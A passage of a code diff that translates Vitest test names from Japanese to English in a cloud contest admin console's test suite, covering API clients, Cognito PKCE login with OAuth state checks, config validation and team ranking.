+  it("should call GET /deployments/:jobId/stack-progress", async () => {
     const { client, calls } = fakeClient({
       jobId: "01H",
       stackName: "tc-x-y",
@@ -195,7 +195,7 @@ describe("getStackProgress", () => {
     expect(calls[0]).toEqual({ path: "/deployments/01H/stack-progress", method: "GET" });
   });
 
-  it("jobId に特殊文字が来ても URL encode するべき", async () => {
+  it("should URL-encode jobId even with special characters", async () => {
     const { client, calls } = fakeClient({
       jobId: "a/b",
       stackName: "x",
@@ -210,30 +210,30 @@ describe("getStackProgress", () => {
 });
 
 describe("statusToIndicator", () => {
-  it("CREATE_COMPLETE は success にすべき", () => {
+  it("should map CREATE_COMPLETE to success", () => {
     expect(statusToIndicator("CREATE_COMPLETE")).toBe("success");
     expect(statusToIndicator("UPDATE_COMPLETE")).toBe("success");
   });
 
-  it("CREATE_FAILED は error にすべき", () => {
+  it("should map CREATE_FAILED to error", () => {
     expect(statusToIndicator("CREATE_FAILED")).toBe("error");
     expect(statusToIndicator("UPDATE_FAILED")).toBe("error");
   });
 
-  it("ROLLBACK 系は warning にすべき", () => {
+  it("should map ROLLBACK statuses to warning", () => {
     expect(statusToIndicator("ROLLBACK_IN_PROGRESS")).toBe("warning");
     expect(statusToIndicator("UPDATE_ROLLBACK_COMPLETE")).toBe("warning");
   });
 
-  it("DELETE_COMPLETE は stopped にすべき", () => {
+  it("should map DELETE_COMPLETE to stopped", () => {
     expect(statusToIndicator("DELETE_COMPLETE")).toBe("stopped");
   });
 
-  it("CREATE_IN_PROGRESS は in-progress にすべき", () => {
+  it("should map CREATE_IN_PROGRESS to in-progress", () => {
     expect(statusToIndicator("CREATE_IN_PROGRESS")).toBe("in-progress");
   });
 
-  it("未知 status は in-progress にフォールバックすべき", () => {
+  it("should fall back to in-progress for unknown status", () => {
     expect(statusToIndicator("SOMETHING_NEW_FROM_FUTURE_CFN")).toBe("in-progress");
   });
 });

--- a/apps/application-admin-console/test/api/events-client.test.ts
+++ b/apps/application-admin-console/test/api/events-client.test.ts
@@ -45,7 +45,7 @@ function fakeClient(response: unknown): { client: ApiClient; calls: CapturedCall
 }
 
 describe("EVENT_ID_RE", () => {
-  it("ULID 形式のみマッチするべき", () => {
+  it("should match ULID format only", () => {
     expect(EVENT_ID_RE.test("01KQZRZSTT6EQC9JVK4FQKRKKM")).toBe(true);
     expect(EVENT_ID_RE.test("not-a-ulid")).toBe(false);
     expect(EVENT_ID_RE.test("01kqzrzstt6eqc9jvk4fqkrkkm")).toBe(false); // lowercase
@@ -54,13 +54,13 @@ describe("EVENT_ID_RE", () => {
 });
 
 describe("listEvents", () => {
-  it("limit / cursor を query string に詰めるべき", async () => {
+  it("should pack limit / cursor into the query string", async () => {
     const { client, calls } = fakeClient({ items: [] });
     await listEvents(client, { limit: 50, cursor: "abc" });
     expect(calls[0]?.path).toBe("events?limit=50&cursor=abc");
   });
 
-  it("オプション無しは plain `events` を呼ぶべき", async () => {
+  it("should call plain `events` when no options are provided", async () => {
     const { client, calls } = fakeClient({ items: [] });
     await listEvents(client);
     expect(calls[0]?.path).toBe("events");
@@ -68,7 +68,7 @@ describe("listEvents", () => {
 });
 
 describe("getEvent", () => {
-  it("eventId を URL encode して GET するべき", async () => {
+  it("should URL-encode eventId and GET it", async () => {
     const { client, calls } = fakeClient({ eventId: "EV1" });
     await getEvent(client, "EV1");
     expect(calls[0]?.path).toBe("events/EV1");
@@ -77,7 +77,7 @@ describe("getEvent", () => {
 });
 
 describe("createEvent", () => {
-  it("POST /events に body をそのまま送るべき", async () => {
+  it("should POST body as-is to /events", async () => {
     const { client, calls } = fakeClient({
       eventId: "EV1",
       status: "DRAFT",
@@ -104,7 +104,7 @@ describe("createEvent", () => {
 });
 
 describe("bulkDeployEvent", () => {
-  it("POST /events/{id}/deploy を空 body で呼び結果 BulkResult を返すべき", async () => {
+  it("should POST /events/{id}/deploy with an empty body and return BulkResult", async () => {
     const { client, calls } = fakeClient({ eventId: "EV1", enqueued: 6, skipped: 0 });
     const out = await bulkDeployEvent(client, "EV1");
     expect(calls[0]?.path).toBe("events/EV1/deploy");
@@ -114,20 +114,20 @@ describe("bulkDeployEvent", () => {
   });
 
   // #555: opt-in body の partial deploy / retry-failed 経路
-  it("retryFailedOnly: true を body にそのまま乗せて POST するべき", async () => {
+  it("should POST with retryFailedOnly: true passed through in body", async () => {
     const { client, calls } = fakeClient({ eventId: "EV1", enqueued: 2, skipped: 0 });
     await bulkDeployEvent(client, "EV1", { retryFailedOnly: true });
     expect(calls[0]?.path).toBe("events/EV1/deploy");
     expect(calls[0]?.body).toEqual({ retryFailedOnly: true });
   });
 
-  it("teamIds / problemIds を body にそのまま乗せて POST するべき (部分 deploy)", async () => {
+  it("should POST with teamIds / problemIds passed through in body (partial deploy)", async () => {
     const { client, calls } = fakeClient({ eventId: "EV1", enqueued: 2, skipped: 0 });
     await bulkDeployEvent(client, "EV1", { teamIds: ["t1"], problemIds: ["hello-world"] });
     expect(calls[0]?.body).toEqual({ teamIds: ["t1"], problemIds: ["hello-world"] });
   });
 
-  it("forceRedeploy: true を body にそのまま乗せて POST するべき", async () => {
+  it("should POST with forceRedeploy: true passed through in body", async () => {
     const { client, calls } = fakeClient({ eventId: "EV1", enqueued: 2, skipped: 0 });
     await bulkDeployEvent(client, "EV1", { forceRedeploy: true });
     expect(calls[0]?.body).toEqual({ forceRedeploy: true });
@@ -135,7 +135,7 @@ describe("bulkDeployEvent", () => {
 });
 
 describe("bulkTeardownEvent", () => {
-  it("DELETE /events/{id} を呼んで BulkResult を返すべき (delJson 経由)", async () => {
+  it("should DELETE /events/{id} and return BulkResult (via delJson)", async () => {
     const { client, calls } = fakeClient({ eventId: "EV1", enqueued: 6, skipped: 0 });
     const out = await bulkTeardownEvent(client, "EV1");
     expect(calls[0]?.path).toBe("events/EV1");
@@ -145,7 +145,7 @@ describe("bulkTeardownEvent", () => {
 });
 
 describe("endEvent", () => {
-  it("POST /events/{id}/end を空 body で呼び EndEventResult を返すべき", async () => {
+  it("should POST /events/{id}/end with an empty body and return EndEventResult", async () => {
     const { client, calls } = fakeClient({
       endsAt: "2026-05-08T10:00:00.000Z",
       updatedDeployments: 12,
@@ -160,7 +160,7 @@ describe("endEvent", () => {
 });
 
 describe("archiveEvent", () => {
-  it("POST /events/{id}/archive を空 body で呼び ArchiveEventResult を返すべき", async () => {
+  it("should POST /events/{id}/archive with an empty body and return ArchiveEventResult", async () => {
     const { client, calls } = fakeClient({ archivedAt: "2026-05-09T10:00:00.000Z" });
     const out = await archiveEvent(client, "EV1");
     expect(calls[0]?.path).toBe("events/EV1/archive");

--- a/apps/application-admin-console/test/auth/cognito.test.ts
+++ b/apps/application-admin-console/test/auth/cognito.test.ts
@@ -20,14 +20,14 @@ const config: AppConfig = {
 describe("loadStoredTokens", () => {
   beforeEach(() => sessionStorage.clear());
 
-  describe("sessionStorage にトークンが無いとき", () => {
-    it("null を返すべき", () => {
+  describe("when sessionStorage has no tokens", () => {
+    it("should return null", () => {
       expect(loadStoredTokens()).toBeNull();
     });
   });
 
-  describe("保存されたトークンが既に expire しているとき", () => {
-    it("null を返すべき", () => {
+  describe("when the stored tokens are already expired", () => {
+    it("should return null", () => {
       const expired: TokenSet = {
         idToken: "id",
         accessToken: "ac",
@@ -38,8 +38,8 @@ describe("loadStoredTokens", () => {
     });
   });
 
-  describe("有効なトークンが保存されているとき", () => {
-    it("その TokenSet を返すべき", () => {
+  describe("when a valid TokenSet is stored", () => {
+    it("should return that TokenSet", () => {
       const valid: TokenSet = {
         idToken: "id",
         accessToken: "ac",
@@ -57,8 +57,8 @@ describe("completeLogin", () => {
     sessionStorage.clear();
   });
 
-  describe("PKCE verifier が session に無いとき", () => {
-    it("エラーを投げるべき", async () => {
+  describe("when the PKCE verifier is missing from session", () => {
+    it("should throw an error", async () => {
       // Issue #873: regex regression を回避。
       await expect(completeLogin(config, "code")).rejects.toMatchObject({
         message: expect.stringContaining("PKCE verifier missing"),
@@ -66,7 +66,7 @@ describe("completeLogin", () => {
     });
   });
 
-  describe("Cognito が 200 とトークンを返したとき", () => {
+  describe("when Cognito returns 200 with tokens", () => {
     let tokens: TokenSet;
     beforeEach(async () => {
       sessionStorage.setItem("TenkaCloud.pkce_verifier", "v");
@@ -89,29 +89,29 @@ describe("completeLogin", () => {
       tokens = await completeLogin(config, "code", "STATE-OK");
     });
 
-    it("id_token を TokenSet.idToken に入れるべき", () => {
+    it("should store id_token in TokenSet.idToken", () => {
       expect(tokens.idToken).toBe("ID");
     });
 
-    it("access_token を TokenSet.accessToken に入れるべき", () => {
+    it("should store access_token in TokenSet.accessToken", () => {
       expect(tokens.accessToken).toBe("AC");
     });
 
-    it("refresh_token を TokenSet.refreshToken に入れるべき", () => {
+    it("should store refresh_token in TokenSet.refreshToken", () => {
       expect(tokens.refreshToken).toBe("RF");
     });
 
-    it("expires_in を未来時刻 (expiresAt) に換算するべき", () => {
+    it("should convert expires_in into a future timestamp (expiresAt)", () => {
       expect(tokens.expiresAt).toBeGreaterThan(Date.now());
     });
 
-    it("トークンを sessionStorage に永続化するべき", () => {
+    it("should persist tokens to sessionStorage", () => {
       expect(loadStoredTokens()?.idToken).toBe("ID");
     });
   });
 
-  describe("Cognito が 4xx を返したとき", () => {
-    it("ステータスと detail を含むエラーを投げるべき", async () => {
+  describe("when Cognito returns 4xx", () => {
+    it("should throw an error containing status and detail", async () => {
       sessionStorage.setItem("TenkaCloud.pkce_verifier", "v");
       sessionStorage.setItem("TenkaCloud.oauth_state", "STATE-OK");
       vi.stubGlobal(
@@ -128,7 +128,7 @@ describe("completeLogin", () => {
   });
 
   describe("Issue #861: state validation fail-closed", () => {
-    it("returnedState 不一致は throw", async () => {
+    it("should throw when returnedState does not match", async () => {
       sessionStorage.setItem("TenkaCloud.pkce_verifier", "v");
       sessionStorage.setItem("TenkaCloud.oauth_state", "EXPECTED");
       await expect(completeLogin(config, "code", "ATTACKER")).rejects.toMatchObject({
@@ -136,7 +136,7 @@ describe("completeLogin", () => {
       });
     });
 
-    it("session に state が無いと throw (= 旧 silent skip を塞ぐ)", async () => {
+    it("should throw when session has no state (= close old silent-skip path)", async () => {
       sessionStorage.setItem("TenkaCloud.pkce_verifier", "v");
       await expect(completeLogin(config, "code", "ATTACKER")).rejects.toMatchObject({
         message: expect.stringContaining("OAuth state mismatch"),
@@ -146,7 +146,7 @@ describe("completeLogin", () => {
 });
 
 describe("clearTokens", () => {
-  it("保存された verifier とトークンを両方削除すべき", () => {
+  it("should delete both the stored verifier and tokens", () => {
     sessionStorage.setItem("TenkaCloud.pkce_verifier", "v");
     sessionStorage.setItem("TenkaCloud.tokens", "{}");
     clearTokens();

--- a/apps/application-admin-console/test/auth/jwt.test.ts
+++ b/apps/application-admin-console/test/auth/jwt.test.ts
@@ -15,8 +15,8 @@ function buildToken(payload: Record<string, unknown>): string {
 }
 
 describe("decodeIdToken", () => {
-  describe("Cognito id_token 相当の payload を含む JWT を渡したとき", () => {
-    it("email と custom:tenantId を抽出できるべき", () => {
+  describe("when given a JWT containing a Cognito id_token-equivalent payload", () => {
+    it("should extract email and custom:tenantId", () => {
       const token = buildToken({
         sub: "user-1",
         email: "a@b.com",
@@ -29,8 +29,8 @@ describe("decodeIdToken", () => {
     });
   });
 
-  describe("payload に custom:tenantId が無いとき", () => {
-    it("tenantId は undefined、email は返るべき", () => {
+  describe("when payload has no custom:tenantId", () => {
+    it("should return undefined tenantId but still return email", () => {
       const token = buildToken({ email: "a@b.com" });
       const claims = decodeIdToken(token);
       expect(claims?.email).toBe("a@b.com");
@@ -38,15 +38,15 @@ describe("decodeIdToken", () => {
     });
   });
 
-  describe("JWT の段数が 3 で無いとき", () => {
-    it("null を返すべき", () => {
+  describe("when JWT does not have 3 segments", () => {
+    it("should return null", () => {
       expect(decodeIdToken("header.body")).toBeNull();
       expect(decodeIdToken("single")).toBeNull();
     });
   });
 
-  describe("payload が JSON で無いとき", () => {
-    it("null を返すべき (例外を投げない)", () => {
+  describe("when payload is not JSON", () => {
+    it("should return null (without throwing)", () => {
       // 有効 base64 だけど JSON で無い
       const malformed = `aaaa.${btoa("not json")}.sig`;
       expect(decodeIdToken(malformed)).toBeNull();

--- a/apps/application-admin-console/test/auth/pkce.test.ts
+++ b/apps/application-admin-console/test/auth/pkce.test.ts
@@ -2,20 +2,20 @@ import { describe, expect, it } from "vitest";
 import { deriveChallenge, generateVerifier } from "../../src/auth/pkce";
 
 describe("generateVerifier", () => {
-  describe("指定された長さで呼び出したとき", () => {
-    it("その長さ（43〜128 の範囲）の文字列を返すべき", () => {
+  describe("when called with a specified length", () => {
+    it("should return a string of that length (within the 43-128 range)", () => {
       const verifier = generateVerifier(64);
       expect(verifier.length).toBe(64);
     });
 
-    it("RFC 7636 の文字集合（[A-Za-z0-9\\-._~]）のみを含むべき", () => {
+    it("should contain only the RFC 7636 character set ([A-Za-z0-9\\-._~])", () => {
       const verifier = generateVerifier(64);
       expect(verifier).toMatch(/^[A-Za-z0-9\-._~]+$/);
     });
   });
 
-  describe("複数回呼び出したとき", () => {
-    it("それぞれ異なる値を返すべき", () => {
+  describe("when called multiple times", () => {
+    it("should return different values each time", () => {
       const a = generateVerifier();
       const b = generateVerifier();
       expect(a).not.toBe(b);
@@ -24,8 +24,8 @@ describe("generateVerifier", () => {
 });
 
 describe("deriveChallenge", () => {
-  describe("既知の verifier を渡したとき", () => {
-    it("RFC 7636 Appendix B の base64url(SHA-256) を返すべき", async () => {
+  describe("when given a known verifier", () => {
+    it("should return the base64url(SHA-256) from RFC 7636 Appendix B", async () => {
       const verifier = "dBjftJeZ4CVP-mB92K27uhbUJU1p1r_wW1gFWFOEjXk";
       const expected = "E9Melhoa2OwvFrEMTJguCHaoeK1t8URWbuGJSstw-cM";
       expect(await deriveChallenge(verifier)).toBe(expected);

--- a/apps/application-admin-console/test/components/SendNotificationModal.test.tsx
+++ b/apps/application-admin-console/test/components/SendNotificationModal.test.tsx
@@ -55,7 +55,7 @@ beforeEach(() => {
 afterEach(() => vi.restoreAllMocks());
 
 describe("SendNotificationModal", () => {
-  it("初期状態: title / body 空で 送信 disabled", () => {
+  it("should disable submit when title and body are empty (initial state)", () => {
     render(
       withI18n(
         <SendNotificationModal
@@ -71,7 +71,7 @@ describe("SendNotificationModal", () => {
     expect(submit).toBeDisabled();
   });
 
-  it("title + body 入力後は 送信 enabled", async () => {
+  it("should enable submit after title and body are filled", async () => {
     const user = userEvent.setup();
     render(
       withI18n(
@@ -89,7 +89,7 @@ describe("SendNotificationModal", () => {
     expect(screen.getByRole("button", { name: "送信" })).toBeEnabled();
   });
 
-  it("送信成功: createNotification を正しい args で呼び onSuccess を呼ぶ", async () => {
+  it("should call createNotification with correct args and invoke onSuccess on success", async () => {
     const user = userEvent.setup();
     const onSuccess = vi.fn();
     mocks.createNotification.mockResolvedValueOnce({
@@ -120,7 +120,7 @@ describe("SendNotificationModal", () => {
     });
   });
 
-  it("送信失敗: API error を Alert に表示し onSuccess は呼ばない", async () => {
+  it("should show API error in Alert and NOT call onSuccess on failure", async () => {
     const user = userEvent.setup();
     const onSuccess = vi.fn();
     mocks.createNotification.mockRejectedValueOnce(new Error("ddb throttled"));
@@ -144,7 +144,7 @@ describe("SendNotificationModal", () => {
     expect(onSuccess).not.toHaveBeenCalled();
   });
 
-  it("title が 120 文字超なら errorText を出して 送信 disabled", () => {
+  it("should show errorText and disable submit when title exceeds 120 characters", () => {
     render(
       withI18n(
         <SendNotificationModal
@@ -165,24 +165,24 @@ describe("SendNotificationModal", () => {
 });
 
 describe("SendNotificationModal helpers", () => {
-  it("title / body が制限内で非空なら submit 可能にすべき", () => {
+  it("should allow submit when title and body are non-empty and within limits", () => {
     expect(isNotificationDraftValid({ title: "T", body: "B" })).toBe(true);
   });
 
-  it("title / body が空または上限超過なら submit 不可にすべき", () => {
+  it("should disallow submit when title or body is empty or exceeds the limit", () => {
     expect(isNotificationDraftValid({ title: "", body: "B" })).toBe(false);
     expect(isNotificationDraftValid({ title: "T", body: "" })).toBe(false);
     expect(isNotificationDraftValid({ title: "a".repeat(121), body: "B" })).toBe(false);
     expect(isNotificationDraftValid({ title: "T", body: "b".repeat(2001) })).toBe(false);
   });
 
-  it("ApiError は status 付き message に整形すべき", () => {
+  it("should format ApiError into a message that includes status", () => {
     expect(formatNotificationSubmitError(new ApiError(403, "forbidden"))).toBe(
       "403: API 403: forbidden",
     );
   });
 
-  it("Error 以外も string 化すべき", () => {
+  it("should stringify values that are not Error", () => {
     expect(formatNotificationSubmitError("failed")).toBe("failed");
   });
 });

--- a/apps/application-admin-console/test/components/TeamRankingPanel.test.tsx
+++ b/apps/application-admin-console/test/components/TeamRankingPanel.test.tsx
@@ -26,7 +26,7 @@ function team(
 }
 
 describe("computeRanking (Issue #1071)", () => {
-  it("score 降順で順位を割り当てるべき", () => {
+  it("should assign rank in descending score order", () => {
     const rows = computeRanking([
       team("t-1", "alpha", [{ points: 100, occurredAt: "2026-05-19T10:00:00.000Z" }]),
       team("t-2", "beta", [{ points: 300, occurredAt: "2026-05-19T10:00:00.000Z" }]),
@@ -39,7 +39,7 @@ describe("computeRanking (Issue #1071)", () => {
     ]);
   });
 
-  it("同点は最終 update が早い方を上位とすべき (= 標準 tie-break)", () => {
+  it("should rank ties by earliest last update first (= standard tie-break)", () => {
     const rows = computeRanking([
       team("t-1", "later", [{ points: 100, occurredAt: "2026-05-19T10:05:00.000Z" }]),
       team("t-2", "earlier", [{ points: 100, occurredAt: "2026-05-19T10:00:00.000Z" }]),
@@ -48,7 +48,7 @@ describe("computeRanking (Issue #1071)", () => {
     expect(rows[1].teamName).toBe("later");
   });
 
-  it("同点は同順位を割り当てるべき (= 1, 1, 3 のように skip)", () => {
+  it("should assign equal ranks to ties (= skip like 1, 1, 3)", () => {
     const rows = computeRanking([
       team("t-1", "a", [{ points: 200, occurredAt: "2026-05-19T10:00:00.000Z" }]),
       team("t-2", "b", [{ points: 200, occurredAt: "2026-05-19T10:00:00.000Z" }]),
@@ -57,7 +57,7 @@ describe("computeRanking (Issue #1071)", () => {
     expect(rows.map((r) => r.rank)).toEqual([1, 1, 3]);
   });
 
-  it("events 0 件の team も 0 pt で順位に含めるべき", () => {
+  it("should include teams with zero events at 0 pt in the ranking", () => {
     const rows = computeRanking([
       team("t-1", "no-events", []),
       team("t-2", "scored", [{ points: 50, occurredAt: "2026-05-19T10:00:00.000Z" }]),
@@ -68,7 +68,7 @@ describe("computeRanking (Issue #1071)", () => {
     ]);
   });
 
-  it("複数 events を合計すべき", () => {
+  it("should sum multiple events", () => {
     const rows = computeRanking([
       team("t-1", "multi", [
         { points: 30, occurredAt: "2026-05-19T10:00:00.000Z" },

--- a/apps/application-admin-console/test/config.test.ts
+++ b/apps/application-admin-console/test/config.test.ts
@@ -9,7 +9,7 @@ const env = {
 };
 
 describe("loadConfig", () => {
-  describe("/runtime-config.json が必須フィールドを全部返したとき", () => {
+  describe("when /runtime-config.json returns all required fields", () => {
     async function loadWithFullRuntime() {
       vi.stubGlobal(
         "fetch",
@@ -31,31 +31,31 @@ describe("loadConfig", () => {
       return loadConfig(env);
     }
 
-    it("cognitoDomain を runtime-config から取るべき", async () => {
+    it("should take cognitoDomain from runtime-config", async () => {
       expect((await loadWithFullRuntime()).cognitoDomain).toBe(
         "https://prod-tenant.auth.ap-northeast-1.amazoncognito.com",
       );
     });
 
-    it("cognitoClientId を runtime-config.userClientId から取るべき (key が異なる)", async () => {
+    it("should take cognitoClientId from runtime-config.userClientId (different key)", async () => {
       expect((await loadWithFullRuntime()).cognitoClientId).toBe("prod-client-id");
     });
 
-    it("tenantId を runtime-config から取るべき", async () => {
+    it("should take tenantId from runtime-config", async () => {
       expect((await loadWithFullRuntime()).tenantId).toBe("tenant-prod-1");
     });
 
-    it("tenantName を runtime-config から取るべき", async () => {
+    it("should take tenantName from runtime-config", async () => {
       expect((await loadWithFullRuntime()).tenantName).toBe("DENSO 第一事業部");
     });
 
-    it("apiBaseUrl を runtime-config.apiUrl から取るべき (key が異なる)", async () => {
+    it("should take apiBaseUrl from runtime-config.apiUrl (different key)", async () => {
       expect((await loadWithFullRuntime()).apiBaseUrl).toBe("https://prod-api.example.com/prod");
     });
   });
 
-  describe("/runtime-config.json が 404 を返したとき (dev fallback)", () => {
-    it("VITE_COGNITO_* env と DEV_FALLBACK_* placeholder から AppConfig を組み立てるべき", async () => {
+  describe("when /runtime-config.json returns 404 (dev fallback)", () => {
+    it("should assemble AppConfig from VITE_COGNITO_* env and DEV_FALLBACK_* placeholders", async () => {
       vi.stubGlobal("fetch", vi.fn().mockResolvedValue(new Response(null, { status: 404 })));
       const config = await loadConfig(env);
       expect(config.cognitoDomain).toBe("https://dev-cognito.example.com");
@@ -66,8 +66,8 @@ describe("loadConfig", () => {
     });
   });
 
-  describe("/runtime-config.json が 200 だがいずれかのフィールドを欠いているとき", () => {
-    it("cognitoDomain 欠け → env fallback に進むべき", async () => {
+  describe("when /runtime-config.json is 200 but missing some field", () => {
+    it("should fall back to env when cognitoDomain is missing", async () => {
       vi.stubGlobal(
         "fetch",
         vi.fn().mockResolvedValue(
@@ -87,7 +87,7 @@ describe("loadConfig", () => {
       expect(config.tenantId).toBe("dev-local");
     });
 
-    it("apiUrl 欠け → env fallback に進むべき", async () => {
+    it("should fall back to env when apiUrl is missing", async () => {
       vi.stubGlobal(
         "fetch",
         vi.fn().mockResolvedValue(
@@ -108,7 +108,7 @@ describe("loadConfig", () => {
   });
 
   describe("Issue #871: runtime-config.json validation", () => {
-    it("apiUrl が http:// なら env fallback に倒れるべき (= mixed content / MITM 防御)", async () => {
+    it("should fall back to env when apiUrl is http:// (= mixed content / MITM defense)", async () => {
       vi.spyOn(console, "error").mockImplementation(() => undefined);
       vi.stubGlobal(
         "fetch",
@@ -129,7 +129,7 @@ describe("loadConfig", () => {
       expect(config.apiBaseUrl).toBe("http://localhost:3999");
     });
 
-    it("cognitoDomain が amazoncognito.com 以外なら env fallback に倒れるべき (= allowlist)", async () => {
+    it("should fall back to env when cognitoDomain is not amazoncognito.com (= allowlist)", async () => {
       vi.spyOn(console, "error").mockImplementation(() => undefined);
       vi.stubGlobal(
         "fetch",
@@ -150,7 +150,7 @@ describe("loadConfig", () => {
       expect(config.cognitoDomain).toBe("https://dev-cognito.example.com");
     });
 
-    it("apiUrl が `javascript:` などの非 URL ならは env fallback に倒れるべき", async () => {
+    it("should fall back to env when apiUrl is a non-URL such as `javascript:`", async () => {
       vi.spyOn(console, "error").mockImplementation(() => undefined);
       vi.stubGlobal(
         "fetch",
@@ -173,7 +173,7 @@ describe("loadConfig", () => {
   });
 
   describe("redirectUri", () => {
-    it("常に window.location.origin/callback で組み立てられるべき", async () => {
+    it("should always be assembled as window.location.origin/callback", async () => {
       vi.stubGlobal("fetch", vi.fn().mockResolvedValue(new Response(null, { status: 404 })));
       const config = await loadConfig(env);
       expect(config.redirectUri).toBe(`${window.location.origin}/callback`);
@@ -181,7 +181,7 @@ describe("loadConfig", () => {
   });
 
   describe("scope", () => {
-    it("env に指定が無いとき デフォルト 'openid email profile' を返すべき", async () => {
+    it("should return default 'openid email profile' when env does not specify it", async () => {
       vi.stubGlobal("fetch", vi.fn().mockResolvedValue(new Response(null, { status: 404 })));
       const config = await loadConfig(env);
       expect(config.scope).toBe("openid email profile");

--- a/apps/application-admin-console/test/lib/competitor-accounts-filter.test.ts
+++ b/apps/application-admin-console/test/lib/competitor-accounts-filter.test.ts
@@ -14,29 +14,29 @@ function row(verified: unknown, accountId = "123456789012"): CompetitorAccountSu
 }
 
 describe("filterVerifiedAccounts", () => {
-  it("verified=true な行のみを返すべき", () => {
+  it("should return only rows where verified=true", () => {
     const out = filterVerifiedAccounts([row(true, "1"), row(false, "2")]);
     expect(out).toHaveLength(1);
     expect(out[0].awsAccountId).toBe("1");
   });
 
-  it("null 入力 (= 読み込み中) は空配列を返すべき", () => {
+  it("should return an empty array for null input (= loading)", () => {
     expect(filterVerifiedAccounts(null)).toEqual([]);
   });
 
-  it('backend が万一 string "true" で返してきても弾かないべき (= defensive)', () => {
+  it('should NOT reject when backend returns string "true" (= defensive)', () => {
     const out = filterVerifiedAccounts([row("true", "1"), row("", "2")]);
     expect(out).toHaveLength(1);
     expect(out[0].awsAccountId).toBe("1");
   });
 
-  it("backend が number 1 で返してきても弾かないべき (= defensive)", () => {
+  it("should NOT reject when backend returns number 1 (= defensive)", () => {
     const out = filterVerifiedAccounts([row(1, "1"), row(0, "2")]);
     expect(out).toHaveLength(1);
     expect(out[0].awsAccountId).toBe("1");
   });
 
-  it("空配列入力は空配列を返すべき", () => {
+  it("should return an empty array for empty input", () => {
     expect(filterVerifiedAccounts([])).toEqual([]);
   });
 });

--- a/apps/application-admin-console/test/lib/competitor-bootstrap.test.ts
+++ b/apps/application-admin-console/test/lib/competitor-bootstrap.test.ts
@@ -12,19 +12,19 @@ describe("buildLaunchStackUrl", () => {
     competitorRoleName: "TenkaCloudCompetitorRole",
   };
 
-  it("ap-northeast-1 を default region として CFn quickcreate URL を返すべき", () => {
+  it("should return a CFn quickcreate URL using ap-northeast-1 as default region", () => {
     const url = buildLaunchStackUrl(baseInput);
     expect(url).toContain("https://ap-northeast-1.console.aws.amazon.com/cloudformation/home");
     expect(url).toContain("#/stacks/quickcreate");
   });
 
-  it("templateURL に public repo の raw URL が pre-fill されるべき", () => {
+  it("should pre-fill templateURL with the public repo raw URL", () => {
     const url = buildLaunchStackUrl(baseInput);
     const decoded = decodeURIComponent(url);
     expect(decoded).toContain(COMPETITOR_BOOTSTRAP_TEMPLATE_URL);
   });
 
-  it("Parameter 3 値が CFn pre-fill query string として埋め込まれるべき", () => {
+  it("should embed the 3 Parameter values as CFn pre-fill query strings", () => {
     const url = buildLaunchStackUrl(baseInput);
     const decoded = decodeURIComponent(url);
     expect(decoded).toContain("param_TenkaCloudAccountId=123456789012");
@@ -32,7 +32,7 @@ describe("buildLaunchStackUrl", () => {
     expect(decoded).toContain("param_RoleName=TenkaCloudCompetitorRole");
   });
 
-  it("region を上書きできるべき", () => {
+  it("should allow region to be overridden", () => {
     const url = buildLaunchStackUrl({ ...baseInput, region: "us-east-1" });
     expect(url).toContain("https://us-east-1.console.aws.amazon.com/");
     expect(url).toContain("region=us-east-1");
@@ -46,20 +46,20 @@ describe("buildShareablePayload", () => {
     competitorRoleName: "TenkaCloudCompetitorRole",
   };
 
-  it("3 値すべてを含む shareable payload を返すべき", () => {
+  it("should return a shareable payload that includes all 3 values", () => {
     const payload = buildShareablePayload(input);
     expect(payload).toContain("123456789012");
     expect(payload).toContain("ext-abc-123");
     expect(payload).toContain("TenkaCloudCompetitorRole");
   });
 
-  it("CFn テンプレ raw URL と Quick-create URL の両方を含むべき", () => {
+  it("should include both the CFn template raw URL and the Quick-create URL", () => {
     const payload = buildShareablePayload(input);
     expect(payload).toContain(COMPETITOR_BOOTSTRAP_TEMPLATE_URL);
     expect(payload).toContain("quickcreate");
   });
 
-  it("競技者向けの手順テキストを含むべき", () => {
+  it("should include competitor-facing instruction text", () => {
     const payload = buildShareablePayload(input);
     expect(payload).toContain("deploy 手順");
     expect(payload).toContain("Verify");
@@ -67,7 +67,7 @@ describe("buildShareablePayload", () => {
 });
 
 describe("COMPETITOR_BOOTSTRAP_TEMPLATE_URL", () => {
-  it("public repo の raw URL を指すべき (= 競技者 access 可能)", () => {
+  it("should point to a public repo raw URL (= accessible to competitors)", () => {
     expect(COMPETITOR_BOOTSTRAP_TEMPLATE_URL).toMatch(
       /^https:\/\/raw\.githubusercontent\.com\/.+\/competitor-bootstrap\.yaml$/,
     );

--- a/apps/application-admin-console/test/lib/deploy-phases.test.ts
+++ b/apps/application-admin-console/test/lib/deploy-phases.test.ts
@@ -88,7 +88,7 @@ const progressWithFailed: StackProgress = {
 };
 
 describe("derivePhases", () => {
-  it("status=COMPLETE のとき 5 phase が全部 Complete (or Skipped) で表示されるべき", () => {
+  it("should show all 5 phases as Complete (or Skipped) when status=COMPLETE", () => {
     const phases = derivePhases({ ...baseDeployment, status: "COMPLETE" }, progressAllComplete);
     expect(phases.map((p) => p.id)).toEqual([
       "enqueued",
@@ -104,20 +104,20 @@ describe("derivePhases", () => {
     expect(phases[4].status).toBe("complete"); // Final
   });
 
-  it("status=FAILED かつ CFn 進行ありのとき CloudFormation Deploy phase が Failed で表示されるべき", () => {
+  it("should show CloudFormation Deploy phase as Failed when status=FAILED with CFn progress", () => {
     const phases = derivePhases({ ...baseDeployment, status: "FAILED" }, progressWithFailed);
     expect(pick(phases, "building").status).toBe("complete"); // CFn 観測あり → Build は通った
     expect(pick(phases, "cfn-deploy").status).toBe("failed");
     expect(pick(phases, "complete").status).toBe("failed");
   });
 
-  it("status=FAILED かつ CFn 未観測のとき Building phase が Failed で表示されるべき", () => {
+  it("should show Building phase as Failed when status=FAILED with no CFn observed", () => {
     const phases = derivePhases({ ...baseDeployment, status: "FAILED" }, emptyProgress);
     expect(pick(phases, "building").status).toBe("failed");
     expect(pick(phases, "cfn-deploy").status).toBe("pending");
   });
 
-  it("status=IN_PROGRESS かつ CFn 進行中のとき該当 phase が In Progress で表示されるべき", () => {
+  it("should show the relevant phase as In Progress when status=IN_PROGRESS with CFn in progress", () => {
     const phases = derivePhases(
       { ...baseDeployment, status: "IN_PROGRESS" },
       progressWithCreateInProgress,
@@ -126,24 +126,24 @@ describe("derivePhases", () => {
     expect(pick(phases, "cfn-deploy").status).toBe("in-progress");
   });
 
-  it("stackEvents が空かつ status=IN_PROGRESS のとき CloudFormation Deploy phase は Pending で表示されるべき", () => {
+  it("should show CloudFormation Deploy phase as Pending when stackEvents is empty and status=IN_PROGRESS", () => {
